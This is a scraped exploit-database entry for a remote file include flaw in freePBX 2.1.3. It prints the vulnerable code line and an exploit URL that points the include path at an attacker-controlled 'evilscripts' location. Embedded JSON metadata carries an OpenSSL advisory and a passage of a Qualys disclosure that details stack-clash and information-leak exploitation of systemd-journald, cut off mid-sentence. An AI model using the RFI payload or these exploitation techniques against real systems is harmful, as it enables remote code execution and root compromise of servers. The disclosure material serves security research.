Search...

freePBX 2.1.3 (upgrade.php) Remote File Include Vulnerability

2006-10-28T00:00:00

ID 1337DAY-ID-1076
Type zdt
Reporter xoron
Modified 2006-10-28T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =============================================================
freePBX 2.1.3 (upgrade.php) Remote File Include Vulnerability
=============================================================



Script: freePBX
Version: v2.1.3
Code: require_once($amp_conf["AMPWEBROOT"] . "/admin/functions.inc.php");
Exploit: upgrades/2.1beta1/upgrade.php?amp_conf[AMPWEBROOT]=evilscripts?
Found: Cyber-Security
Thanks: DJR, xoron, [email protected], trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide



#  0day.today [2018-03-05]  #

JSON Vulners Source

Initial Source

{"hash": "0fde3cc344a0e37f88099a9ca8a4bcef40c34cb5d22a640a9254956171154808", "id": "1337DAY-ID-1076", "lastseen": "2018-03-05T21:35:26", "viewCount": 14, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "0d0263a0007c0d95394410d6dd276b12", "key": "href"}, {"hash": "c9752ba5fabdf92d3f742767760a1c61", "key": "modified"}, {"hash": "c9752ba5fabdf92d3f742767760a1c61", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "3b38b72ec583e2eedac01234b17beef7", "key": "reporter"}, {"hash": "5e7c6b5921216ff71e574d665dcd16f2", "key": "sourceData"}, {"hash": "77f5b550685e062fbac2f15625babff4", "key": "sourceHref"}, {"hash": "748262351ce44af6094dc3dfc3491b03", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2018-03-05T21:35:26"}, "dependencies": {"references": [{"type": "amazon", "idList": ["ALAS-2019-1188"]}, {"type": "gentoo", "idList": ["GLSA-201903-10"]}, {"type": "zdt", "idList": ["1337DAY-ID-31916", "1337DAY-ID-30734", "1337DAY-ID-30735", "1337DAY-ID-30737", "1337DAY-ID-30739", "1337DAY-ID-30738", "1337DAY-ID-30736", "1337DAY-ID-30740"]}, {"type": "zeroscience", "idList": ["ZSL-2018-5484", "ZSL-2018-5485", "ZSL-2018-5479", "ZSL-2018-5481", "ZSL-2018-5478", "ZSL-2018-5486", "ZSL-2018-5480"]}, {"type": "nessus", "idList": ["ORACLELINUX_ELSA-2018-4126.NASL", "SUSE_SU-2018-1076-1.NASL"]}, {"type": "oraclelinux", "idList": ["ELSA-2018-0418"]}], "modified": "2018-03-05T21:35:26"}, "vulnersScore": -0.4}, "type": "zdt", "sourceHref": "https://0day.today/exploit/1076", "description": "Exploit for unknown platform in category web applications", "title": "freePBX 2.1.3 (upgrade.php) Remote File Include Vulnerability", "history": [{"bulletin": {"hash": "a76445a70791c82f60ca6e3876c102d164defc742859e5fec6c684a169937f82", "id": "1337DAY-ID-1076", "lastseen": "2016-04-20T01:01:13", "enchantments": {"score": {"value": 5.1, "modified": "2016-04-20T01:01:13"}}, "hashmap": [{"hash": "c8e103225b245290d89a1a2ea0f2a67b", "key": "sourceHref"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "c9752ba5fabdf92d3f742767760a1c61", "key": "published"}, {"hash": "c9752ba5fabdf92d3f742767760a1c61", "key": "modified"}, {"hash": "3b38b72ec583e2eedac01234b17beef7", "key": "reporter"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "748262351ce44af6094dc3dfc3491b03", "key": "title"}, {"hash": "566cf6ed3dbd269df5804767fec39057", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "50af2a97c75e5d580214c71f33ec3d72", "key": "sourceData"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/1076", "description": "Exploit for unknown platform in category web applications", "viewCount": 3, "title": "freePBX 2.1.3 (upgrade.php) Remote File Include Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "=============================================================\r\nfreePBX 2.1.3 (upgrade.php) Remote File Include Vulnerability\r\n=============================================================\r\n\r\n\r\n\r\nScript: freePBX\r\nVersion: v2.1.3\r\nCode: require_once($amp_conf[\"AMPWEBROOT\"] . \"/admin/functions.inc.php\");\r\nExploit: upgrades/2.1beta1/upgrade.php?amp_conf[AMPWEBROOT]=evilscripts?\r\nFound: Cyber-Security\r\nThanks: DJR, xoron, K@OS, trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "published": "2006-10-28T00:00:00", "references": [], "reporter": "xoron", "modified": "2006-10-28T00:00:00", "href": "http://0day.today/exploit/description/1076"}, "lastseen": "2016-04-20T01:01:13", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "=============================================================\r\nfreePBX 2.1.3 (upgrade.php) Remote File Include Vulnerability\r\n=============================================================\r\n\r\n\r\n\r\nScript: freePBX\r\nVersion: v2.1.3\r\nCode: require_once($amp_conf[\"AMPWEBROOT\"] . \"/admin/functions.inc.php\");\r\nExploit: upgrades/2.1beta1/upgrade.php?amp_conf[AMPWEBROOT]=evilscripts?\r\nFound: Cyber-Security\r\nThanks: DJR, xoron, [email\u00a0protected], trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide\r\n\r\n\r\n\n# 0day.today [2018-03-05] #", "published": "2006-10-28T00:00:00", "references": [], "reporter": "xoron", "modified": "2006-10-28T00:00:00", "href": "https://0day.today/exploit/description/1076"}

{"amazon": [{"lastseen": "2019-05-29T19:20:40", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nA microprocessor side-channel vulnerability was found on SMT (e.g, Hyper-Threading) architectures. An attacker running a malicious process on the same core of the processor as the victim process can extract certain secret information. ([CVE-2018-5407 __](<https://access.redhat.com/security/cve/CVE-2018-5407>))\n\nIf an application encounters a fatal protocol error and then calls SSL_shutdown() twice (once to send a close_notify, and once to receive one) then OpenSSL can respond differently to the calling application if a 0 byte record is received with invalid padding compared to if a 0 byte record is received with an invalid MAC. If the application then behaves differently based on that in a way that is detectable to the remote peer, then this amounts to a padding oracle that could be used to decrypt data. In order for this to be exploitable \"non-stitched\" ciphersuites must be in use. Stitched ciphersuites are optimised implementations of certain commonly used ciphersuites. Also the application must call SSL_shutdown() twice even if a protocol error has occurred (applications should not do this but some do anyway). \n([CVE-2019-1559 __](<https://access.redhat.com/security/cve/CVE-2019-1559>))\n\n \n**Affected Packages:** \n\n\nopenssl\n\n \n**Issue Correction:** \nRun _yum update openssl_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n openssl-debuginfo-1.0.2k-16.150.amzn1.i686 \n openssl-1.0.2k-16.150.amzn1.i686 \n openssl-static-1.0.2k-16.150.amzn1.i686 \n openssl-devel-1.0.2k-16.150.amzn1.i686 \n openssl-perl-1.0.2k-16.150.amzn1.i686 \n \n src: \n openssl-1.0.2k-16.150.amzn1.src \n \n x86_64: \n openssl-1.0.2k-16.150.amzn1.x86_64 \n openssl-static-1.0.2k-16.150.amzn1.x86_64 \n openssl-devel-1.0.2k-16.150.amzn1.x86_64 \n openssl-debuginfo-1.0.2k-16.150.amzn1.x86_64 \n openssl-perl-1.0.2k-16.150.amzn1.x86_64 \n \n \n", "modified": "2019-04-09T16:10:00", "published": "2019-04-09T16:10:00", "id": "ALAS-2019-1188", "href": "https://alas.aws.amazon.com/ALAS-2019-1188.html", "title": "Medium: openssl", "type": "amazon", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "zdt": [{"lastseen": "2019-01-13T00:31:11", "bulletinFamily": "exploit", "description": "This is a thorough analysis of how Qualys approached exploiting three vulnerabilities in systemd-journald. Although they have not released formal exploits yet, they detail in here is useful in understanding the flaws.", "modified": "2019-01-11T00:00:00", "published": "2019-01-11T00:00:00", "id": "1337DAY-ID-31916", "href": "https://0day.today/exploit/description/31916", "title": "systemd-journald Memory Corruption / Information Leak Vulnerability", "type": "zdt", "sourceData": "Qualys Security Advisory\r\n\r\nSystem Down: A systemd-journald exploit\r\n\r\n\r\n========================================================================\r\nContents\r\n========================================================================\r\n\r\nSummary\r\nCVE-2018-16864\r\n- Analysis\r\n- Exploitation\r\nCVE-2018-16865\r\n- Analysis\r\n- Exploitation\r\nCVE-2018-16866\r\n- Analysis\r\n- Exploitation\r\nCombined Exploitation of CVE-2018-16865 and CVE-2018-16866\r\n- amd64 Exploitation\r\n- i386 Exploitation\r\nAcknowledgments\r\nTimeline\r\n\r\n Conversion, software version 7.0\r\n -- System of a Down, \"Toxicity\"\r\n\r\n\r\n========================================================================\r\nSummary\r\n========================================================================\r\n\r\nWe discovered three vulnerabilities in systemd-journald\r\n(https://en.wikipedia.org/wiki/Systemd):\r\n\r\n- CVE-2018-16864 and CVE-2018-16865, two memory corruptions\r\n (attacker-controlled alloca()s);\r\n\r\n- CVE-2018-16866, an information leak (an out-of-bounds read).\r\n\r\nCVE-2018-16864 was introduced in April 2013 (systemd v203) and became\r\nexploitable in February 2016 (systemd v230). We developed a proof of\r\nconcept for CVE-2018-16864 that gains eip control on i386.\r\n\r\nCVE-2018-16865 was introduced in December 2011 (systemd v38) and became\r\nexploitable in April 2013 (systemd v201). CVE-2018-16866 was introduced\r\nin June 2015 (systemd v221) and was inadvertently fixed in August 2018.\r\n\r\nWe developed an exploit for CVE-2018-16865 and CVE-2018-16866 that\r\nobtains a local root shell in 10 minutes on i386 and 70 minutes on\r\namd64, on average. We will publish our exploit in the near future.\r\n\r\nTo the best of our knowledge, all systemd-based Linux distributions are\r\nvulnerable, but SUSE Linux Enterprise 15, openSUSE Leap 15.0, and Fedora\r\n28 and 29 are not exploitable because their user space is compiled with\r\nGCC's -fstack-clash-protection.\r\n\r\nThis confirms https://grsecurity.net/an_ancient_kernel_hole_is_not_closed.php:\r\n\"It should be clear that kernel-only attempts to solve [the Stack Clash]\r\nwill necessarily always be incomplete, as the real issue lies in the\r\nlack of stack probing.\"\r\n\r\n\r\n========================================================================\r\nCVE-2018-16864\r\n========================================================================\r\n\r\n------------------------------------------------------------------------\r\nAnalysis\r\n------------------------------------------------------------------------\r\n\r\n The waves all keep on crashing by\r\n -- System of a Down, \"Suggestions\"\r\n\r\nWe accidentally discovered CVE-2018-16864 while working on the exploit\r\nfor Mutagen Astronomy (CVE-2018-14634); if we pass several megabytes of\r\ncommand-line arguments to a program that calls syslog(), then journald\r\ncrashes:\r\n\r\nsystemd-journal[472]: segfault at 7ffe9a077420 ip 00007f45f6174877 sp 00007ffe9a0773f0 error 6 in systemd-journald[7f45f6169000+3f000]\r\n\r\n(gdb) disassemble 0x7f45f6174877 - 0x7f45f6169000\r\nDump of assembler code for function dispatch_message_real.4064:\r\n ...\r\n 0x000000000000b82c <+988>: callq 0x2bd10 <get_process_cmdline.constprop.96>\r\n 0x000000000000b831 <+993>: test %eax,%eax\r\n 0x000000000000b833 <+995>: js 0xb8ea <dispatch_message_real.4064+1178>\r\n 0x000000000000b839 <+1001>: mov -0x218(%rbp),%rbx\r\n 0x000000000000b840 <+1008>: test %rbx,%rbx\r\n 0x000000000000b843 <+1011>: je 0xd31b <dispatch_message_real.4064+7883>\r\n 0x000000000000b849 <+1017>: mov %rbx,%rdi\r\n 0x000000000000b84c <+1020>: callq 0x5360 <[email\u00a0protected]>\r\n 0x000000000000b851 <+1025>: add $0xa,%eax\r\n 0x000000000000b854 <+1028>: cltq\r\n 0x000000000000b856 <+1030>: add $0x1e,%rax\r\n 0x000000000000b85a <+1034>: and $0xfffffffffffffff0,%rax\r\n 0x000000000000b85e <+1038>: sub %rax,%rsp\r\n 0x000000000000b861 <+1041>: movabs $0x454e494c444d435f,%rax\r\n 0x000000000000b86b <+1051>: lea 0x37(%rsp),%r15\r\n 0x000000000000b870 <+1056>: and $0xfffffffffffffff0,%r15\r\n 0x000000000000b874 <+1060>: test %rbx,%rbx\r\n 0x000000000000b877 <+1063>: mov %rax,(%r15)\r\n 0x000000000000b87a <+1066>: mov $0x3d,%eax\r\n 0x000000000000b87f <+1071>: mov %ax,0x8(%r15)\r\n 0x000000000000b884 <+1076>: lea 0x9(%r15),%rax\r\n 0x000000000000b888 <+1080>: je 0xb895 <dispatch_message_real.4064+1093>\r\n 0x000000000000b88a <+1082>: mov %rbx,%rsi\r\n 0x000000000000b88d <+1085>: mov %rax,%rdi\r\n 0x000000000000b890 <+1088>: callq 0x5370 <[email\u00a0protected]>\r\n\r\n538 static void dispatch_message_real(\r\n...\r\n604 r = get_process_cmdline(ucred->pid, 0, false, &t);\r\n605 if (r >= 0) {\r\n606 x = strjoina(\"_CMDLINE=\", t);\r\n\r\n919 #define strjoina(a, ...) \\\r\n920 ({ \\\r\n921 const char *_appendees_[] = { a, __VA_ARGS__ }; \\\r\n922 char *_d_, *_p_; \\\r\n923 int _len_ = 0; \\\r\n924 unsigned _i_; \\\r\n925 for (_i_ = 0; _i_ < ELEMENTSOF(_appendees_) && _appendees_[_i_]; _i_++) \\\r\n926 _len_ += strlen(_appendees_[_i_]); \\\r\n927 _p_ = _d_ = alloca(_len_ + 1); \\\r\n928 for (_i_ = 0; _i_ < ELEMENTSOF(_appendees_) && _appendees_[_i_]; _i_++) \\\r\n929 _p_ = stpcpy(_p_, _appendees_[_i_]); \\\r\n930 *_p_ = 0; \\\r\n931 _d_; \\\r\n932 })\r\n\r\nThis vulnerability, an attacker-controlled alloca()\r\n(https://wiki.sei.cmu.edu/confluence/display/c/MEM05-C.+Avoid+large+stack+allocations)\r\nat instruction 0xb85e and line 927, was introduced in systemd v203:\r\n\r\ncommit ae018d9bc900d6355dea4af05119b49c67945184\r\nDate: Mon Apr 22 23:10:13 2013 -0300\r\n...\r\n r = get_process_cmdline(ucred->pid, 0, false, &t);\r\n if (r >= 0) {\r\n- cmdline = strappend(\"_CMDLINE=\", t);\r\n+ cmdline = strappenda(\"_CMDLINE=\", t);\r\n\r\n(strappenda() was renamed strjoina() in systemd v219) and became\r\nexploitable in systemd v230:\r\n\r\ncommit ac2e41f5103ce2c679089c4f8fb6be61d7caec07\r\nDate: Fri Feb 12 04:59:57 2016 -0800\r\n...\r\n This adds a wait flag to journal_file_set_offline(), when false the offline is\r\n performed asynchronously in a separate thread.\r\n\r\n------------------------------------------------------------------------\r\nExploitation\r\n------------------------------------------------------------------------\r\n\r\n ... it's the race\r\n Can you break out?\r\n -- System of a Down, \"36\"\r\n\r\nCVE-2018-16864 is similar to a Stack Clash vulnerability\r\n(https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt), but:\r\n\r\n- Steps 1 (Clash the stack with another memory region) and 2 (Run the\r\n stack pointer to the start of the stack) are not needed, because the\r\n attacker-controlled alloca() can be very large (several megabytes of\r\n command-line arguments); only Steps 3 (Jump over the stack guard page,\r\n into another memory region) and 4 (Smash the stack, or another memory\r\n region) are needed.\r\n\r\n- In Step 4 (Smash), the alloca() is fully written to (the vulnerability\r\n is essentially a stpcpy(alloca(strlen(cmdline) + 1), cmdline)), and\r\n the stpcpy() (a \"wild copy\") will therefore always crash into a\r\n read-only or unmapped memory region:\r\n\r\n https://googleprojectzero.blogspot.com/2015/03/taming-wild-copy-parallel-thread.html\r\n https://cansecwest.com/slides/2015/Taming%20wild%20copies%20-%20Chris%20evans.pdf\r\n\r\nWe tried to asynchronously interrupt this stpcpy() before it crashes,\r\nwith a signal or a timer, but we failed because journald uses signalfd()\r\nand timerfd_create() to handle these events synchronously.\r\n\r\nWe eventually gained control of eip (i386's instruction pointer) by\r\njumping into and smashing the stack of a concurrent thread (a \"Parallel\r\nThread Corruption\"):\r\n\r\n- First, we send a large, high-priority message (LOG_CRIT or higher) to\r\n journald, from a process whose cmdline is small; this message forces a\r\n large write() (between 1MB and 2MB) to /var/log/journal/ and forces\r\n the creation of a short-lived thread that fsync()s the journal (the\r\n stack of this thread is allocated in the mmap region).\r\n\r\n- Next, we create several processes (between 32 and 64) that write() and\r\n fsync() large files (between 1MB and 8MB) to /var/tmp/ (for example);\r\n these processes stall journald's fsync() thread and will allow us to\r\n win a tight race: exploit the \"wild copy\" before it crashes.\r\n\r\n- Last, we send a small, low-priority message to journald, from a\r\n process whose cmdline is very large (roughly 128MB, the distance\r\n between the main stack and the mmap region); this message forces a\r\n very large alloca() that jumps from journald's main stack into the\r\n stack of the fsync() thread, and smashes a saved eip before fsync()\r\n returns from kernel space.\r\n\r\nOn a Debian stable (9.5), our proof of concept wins this race and gains\r\neip control after a dozen tries (systemd automatically restarts journald\r\nafter each crash):\r\n\r\nsystemd-journal[2195]: segfault at 41414141 ip 41414141 sp b5f3d22c error 14\r\n\r\nDespite this initial success, we abandoned the exploitation of\r\nCVE-2018-16864: while working on our proof of concept, we discovered two\r\ndifferent vulnerabilities (CVE-2018-16865, another attacker-controlled\r\nalloca(), and CVE-2018-16866, an information leak) that are reliably\r\nexploitable on both i386 and amd64.\r\n\r\n\r\n========================================================================\r\nCVE-2018-16865\r\n========================================================================\r\n\r\n------------------------------------------------------------------------\r\nAnalysis\r\n------------------------------------------------------------------------\r\n\r\n Can you feel their haunting presence?\r\n -- System of a Down, \"Holy Mountains\"\r\n\r\nSurprised by the heavy usage of alloca() in journald, we searched for\r\nanother attacker-controlled alloca() and found CVE-2018-16865:\r\n\r\n1963 int journal_file_append_entry(JournalFile *f, const dual_timestamp *ts, const struct iovec iovec[], unsigned n_iovec, uint64_t *seqnum, Object **ret, uint64_t *offset) {\r\n....\r\n1986 items = alloca(sizeof(EntryItem) * MAX(1u, n_iovec));\r\n1987\r\n1988 for (i = 0; i < n_iovec; i++) {\r\n1989 uint64_t p;\r\n1990 Object *o;\r\n1991\r\n1992 r = journal_file_append_data(f, iovec[i].iov_base, iovec[i].iov_len, &o, &p);\r\n1993 if (r < 0)\r\n1994 return r;\r\n1995\r\n1996 xor_hash ^= le64toh(o->data.hash);\r\n1997 items[i].object_offset = htole64(p);\r\n1998 items[i].hash = o->data.hash;\r\n1999 }\r\n\r\nThis vulnerability was introduced in systemd v38:\r\n\r\ncommit cf244689e9d1ab50082c9ddd0f3c4d1eb982badc\r\nDate: Thu Dec 29 15:00:57 2011 +0100\r\n...\r\n- items = new(EntryItem, n_iovec);\r\n- if (!items)\r\n- return -ENOMEM;\r\n+ items = alloca(sizeof(EntryItem) * n_iovec);\r\n\r\nand became exploitable in systemd v201:\r\n\r\ncommit c4aa09b06f835c91cea9e021df4c3605cff2318d\r\nDate: Mon Apr 8 20:32:03 2013 +0200\r\n...\r\n-#define ENTRY_SIZE_MAX (1024*1024*64)\r\n-#define DATA_SIZE_MAX (1024*1024*64)\r\n...\r\n+#define ENTRY_SIZE_MAX (1024*1024*768)\r\n+#define DATA_SIZE_MAX (1024*1024*768)\r\n\r\nIf we send a large \"native\" message to /run/systemd/journal/socket:\r\nsince the maximum size of a \"native\" entry is 768MB, and the minimum\r\nlength of a \"native\" item is 3 (\"A=\\n\"), and the size of an EntryItem\r\nstructure is 16 (a 64-bit offset and a 64-bit hash), the maximum size of\r\nthe attacker-controlled alloca() in journal_file_append_entry() is 768MB\r\n/ 3 * 16 = 4GB, large enough to jump from journald's main stack into the\r\nmmap region, even on amd64.\r\n\r\nOn amd64, as described in the \"64-bit exploitation\" of our Stack Clash\r\nadvisory, the randomized distance between the main stack and the mmap\r\nregion is shorter than 4GB with a probability of (approximately):\r\n\r\nSUM(d = 0; d < 4GB; d++) d / (16GB * 1TB) ~= 1 / 2048\r\n\r\n------------------------------------------------------------------------\r\nExploitation\r\n------------------------------------------------------------------------\r\n\r\n Jump (pogo, pogo, pogo, pogo, pogo, pogo, pogo)\r\n -- System of a Down, \"Bounce\"\r\n\r\nCVE-2018-16865 is basically a simplified Stack Clash vulnerability:\r\n\r\n- Steps 1 (Clash) and 2 (Run) of the Stack Clash are not needed, since\r\n the largest attacker-controlled alloca() is 4GB; only Steps 3 (Jump)\r\n and 4 (Smash) are needed.\r\n\r\n- In Step 4 (Smash), the alloca() is not necessarily fully written to:\r\n if the size of an item is larger than 128MB (DEFAULT_MAX_SIZE_UPPER),\r\n then journal_file_append_data() returns an error that breaks the \"for\"\r\n loop in journal_file_append_entry() (at lines 1992-1994) and avoids a\r\n crash into a read-only or unmapped memory region.\r\n\r\nWe eventually transformed this vulnerability into a crude\r\n\"write-what-where\" (https://cwe.mitre.org/data/definitions/123.html):\r\n\r\n- \"write-where\": We jump into and smash libc's read-write segment, and\r\n thereby overwrite a function pointer. Unfortunately this \"write-where\"\r\n is not surgical: the stack frames of the functions called from within\r\n the \"for\" loop (in journal_file_append_entry()) smash a few kilobytes\r\n below our target function pointer, and therefore overwrite vital libc\r\n variables that may crash or deadlock journald. Consequently, we must\r\n sometimes shift our alloca() jump slightly, to avoid overwriting such\r\n vital variables.\r\n\r\n- \"write-what\": We want to overwrite our target function pointer with\r\n the address of another function or ROP chain, but unfortunately the\r\n stack frames of the functions called from within the \"for\" loop (in\r\n journal_file_append_entry()) do not contain any data that we control.\r\n However, the 64-bit \"hash\" values that are written to the alloca()ted\r\n \"items\" are produced by jenkins_hashlittle2(), a noncryptographic hash\r\n function: we can easily find a short string (a preimage) that hashes\r\n to a given value (the address that will overwrite our target function\r\n pointer) and is also a valid_user_field() (or journal_field_valid()).\r\n\r\n This \"write-what\" restricts our \"write-where\" to function pointers\r\n whose address modulo 16 is equal to 8 (the offset of \"hash\" in the\r\n EntryItem structure).\r\n\r\nTo complete our exploit, we need the address of journald's stack pointer\r\nbefore the alloca() jump, and the address of our target function pointer\r\nin libc's read-write segment -- we need an information leak.\r\n\r\n\r\n========================================================================\r\nCVE-2018-16866\r\n========================================================================\r\n\r\n------------------------------------------------------------------------\r\nAnalysis\r\n------------------------------------------------------------------------\r\n\r\n When they speak, we can peek from the windows of their mouths\r\n -- System of a Down, \"Know\"\r\n\r\nWe discovered an out-of-bounds read in journald (CVE-2018-16866), and\r\ntransformed it into an information leak:\r\n\r\n 31 #define WHITESPACE \" \\t\\n\\r\"\r\n...\r\n194 size_t syslog_parse_identifier(const char **buf, char **identifier, char **pid) {\r\n195 const char *p;\r\n...\r\n197 size_t l, e;\r\n...\r\n203 p = *buf;\r\n204\r\n205 p += strspn(p, WHITESPACE);\r\n206 l = strcspn(p, WHITESPACE);\r\n207\r\n208 if (l <= 0 ||\r\n209 p[l-1] != ':')\r\n210 return 0;\r\n211\r\n212 e = l;\r\n...\r\n240 if (strchr(WHITESPACE, p[e]))\r\n241 e++;\r\n242 *buf = p + e;\r\n243 return e;\r\n244 }\r\n\r\nIf we send a syslog message to journald (in *buf), and if the last\r\ncharacter of this message is a ':' (before the '\\0' terminator), then:\r\n\r\n- at line 240, p[e] is the '\\0' terminator of our message;\r\n\r\n- at line 240, strchr(WHITESPACE, p[e]) returns a pointer to the '\\0'\r\n terminator of the WHITESPACE string (as mentioned in man strchr: \"The\r\n terminating null byte is considered part of the string, so that if c\r\n is specified as '\\0', these functions return a pointer to the\r\n terminator.\");\r\n\r\n- at line 241, e is incremented;\r\n\r\n- at line 242, *buf points out-of-bounds, to the first character after\r\n the '\\0' terminator of our message;\r\n\r\n- later, the out-of-bounds string at *buf (supposedly the body of our\r\n syslog message) is written (leaked) to the journal.\r\n\r\nConsequently, we can read this out-of-bounds string:\r\n\r\n- either directly from the journal (if journald's \"Storage\" is\r\n \"persistent\", or \"auto\" and /var/log/journal/ exists), because\r\n journald supports extended file ACLs (Access Control Lists):\r\n\r\n $ id\r\n uid=1000(john) gid=1000(john) groups=1000(john) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\r\n\r\n $ ls -l /var/log/journal/*/user-$UID.journal\r\n -rw-r-----+ 1 root systemd-journal 8388608 Nov 20 09:35 /var/log/journal/2562d1eced654f44a3d3a217d66b9ff3/user-1000.journal\r\n\r\n $ getfacl /var/log/journal/*/user-$UID.journal\r\n ...\r\n user:john:r--\r\n\r\n $ ./infoleak\r\n\r\n $ journalctl --all --user --lines=1 --identifier=infoleak | hexdump -C\r\n ...\r\n 00000050 2e 20 2d 2d 0a 4e 6f 76 20 32 30 20 31 36 3a 30 |. --.Nov 20 16:0|\r\n 00000060 30 3a 33 36 20 6c 6f 63 61 6c 68 6f 73 74 2e 6c |0:36 localhost.l|\r\n 00000070 6f 63 61 6c 64 6f 6d 61 69 6e 20 69 6e 66 6f 6c |ocaldomain infol|\r\n 00000080 65 61 6b 5b 33 35 34 38 5d 3a 20 78 fb 1e 78 54 |eak[3548]: x..xT|\r\n 00000090 7f 0a |..|\r\n\r\n- or (if journald's \"Storage\" is \"volatile\", or \"auto\" and\r\n /var/log/journal/ does not exist) from a tty that we recorded to\r\n /var/run/utmp, because journald writes (\"walls\") emergency messages\r\n (LOG_EMERG) to the tty of every logged-in user; our exploit records a\r\n tty to /var/run/utmp via an ssh connection to localhost, but other\r\n methods exist (for example, utempter and gnome-pty-helper):\r\n\r\n $ ./infoleak\r\n ...\r\n 00003510 0a 07 0d 0d 0a 42 72 6f 61 64 63 61 73 74 20 6d |.....Broadcast m|\r\n 00003520 65 73 73 61 67 65 20 66 72 6f 6d 20 73 79 73 74 |essage from syst|\r\n 00003530 65 6d 64 2d 6a 6f 75 72 6e 61 6c 64 40 6c 6f 63 |[email\u00a0protected]|\r\n 00003540 61 6c 68 6f 73 74 2e 6c 6f 63 61 6c 64 6f 6d 61 |alhost.localdoma|\r\n 00003550 69 6e 20 28 54 75 65 20 32 30 31 38 2d 31 31 2d |in (Tue 2018-11-|\r\n 00003560 32 30 20 31 36 3a 32 35 3a 34 36 20 43 53 54 29 |20 16:25:46 CST)|\r\n 00003570 3a 0d 0d 0a 0d 0d 0a 69 6e 66 6f 6c 65 61 6b 5b |:......infoleak[|\r\n 00003580 33 38 37 32 5d 3a 20 78 6b a2 e1 2f 7f 0d 0d 0a |3872]: xk../....|\r\n\r\nThis vulnerability was introduced in systemd v221:\r\n\r\ncommit ec5ff4445cca6a1d786b8da36cf6fe0acc0b94c8\r\nDate: Wed Jun 10 22:33:44 2015 -0700\r\n...\r\n- e += strspn(p + e, WHITESPACE);\r\n+ if (strchr(WHITESPACE, p[e]))\r\n+ e++;\r\n\r\nand was inadvertently fixed in August 2018:\r\n\r\ncommit a6aadf4ae0bae185dc4c414d492a4a781c80ffe5\r\nDate: Wed Aug 8 15:06:36 2018 +0900\r\n...\r\n- if (strchr(WHITESPACE, p[e]))\r\n- e++;\r\n+ e += strspn(p + e, WHITESPACE);\r\n\r\ncommit 8595102d3ddde6d25c282f965573a6de34ab4421\r\nDate: Fri Aug 10 11:07:54 2018 +0900\r\n...\r\n- e += strspn(p + e, WHITESPACE);\r\n+ /* Single space is used as separator */\r\n+ if (p[e] != '\\0' && strchr(WHITESPACE, p[e]))\r\n+ e++;\r\n\r\n------------------------------------------------------------------------\r\nExploitation\r\n------------------------------------------------------------------------\r\n\r\n For today we will take the body parts and put them on the wall\r\n -- System of a Down, \"Dreaming\"\r\n\r\nTo leak a stack address or an mmap address from journald:\r\n\r\n- First, we send a large native message to /run/systemd/journal/socket;\r\n journald mmap()s our message, and malloc()ates a large array of iovec\r\n structures: most of these structures point into our mmap()ed message,\r\n but some of them point to the stack (in dispatch_message_real()). The\r\n contents of this iovec array (especially the mmap and stack pointers)\r\n are preserved in a heap hole after free() (after journald finishes\r\n processing our message).\r\n\r\n- Next, we send a large syslog message to /run/systemd/journal/dev-log;\r\n to receive our large message (in server_process_datagram()), journald\r\n realloc()ates its server buffer into the heap hole that previously\r\n contained the iovec array (and still contains remains of mmap and\r\n stack pointers).\r\n\r\n- Last, we send a large syslog message that exploits CVE-2018-16866;\r\n journald receives our large message in its server buffer (in the heap\r\n chunk that previously contained the iovec array), and if we carefully\r\n choose the size of our message and position its terminating \":\" in\r\n front of a remaining mmap or stack pointer, then we can leak this\r\n pointer (it is mistakenly read out-of-bounds as the body of our\r\n message).\r\n\r\n>From this leaked stack pointer we easily deduce journald's stack pointer\r\nbefore the alloca() jump, because the distance between the two depends\r\nonly on journald's executable.\r\n\r\n>From the leaked mmap address we can deduce libc's address, but chunks of\r\nunknown sizes are mmap()ed between the two, and we must therefore adopt\r\ndifferent strategies based on our target architecture (i386 or amd64).\r\n\r\n\r\n========================================================================\r\nCombined Exploitation of CVE-2018-16865 and CVE-2018-16866\r\n========================================================================\r\n\r\n Don't leave your seats now\r\n Popcorn everywhere ...\r\n -- System of a Down, \"CUBErt\"\r\n\r\n------------------------------------------------------------------------\r\namd64 Exploitation\r\n------------------------------------------------------------------------\r\n\r\n- To deduce libc's address from the leaked mmap address of our native\r\n message, we arrange for this message to be mmap()ed into the 2MB hole\r\n between ld.so's read-execute and read-only segments: from this hole's\r\n address we deduce ld.so's address, and hence libc's address (with help\r\n from ldd's output).\r\n\r\n- If the resulting stack-to-libc distance is jumpable (if it is shorter\r\n than 4GB), then we proceed with our \"write-what-where\"; otherwise, we\r\n restart journald (we crash it with an alloca() of RLIMIT_STACK -- 8MB\r\n by default) and try again.\r\n\r\n We have a good chance of 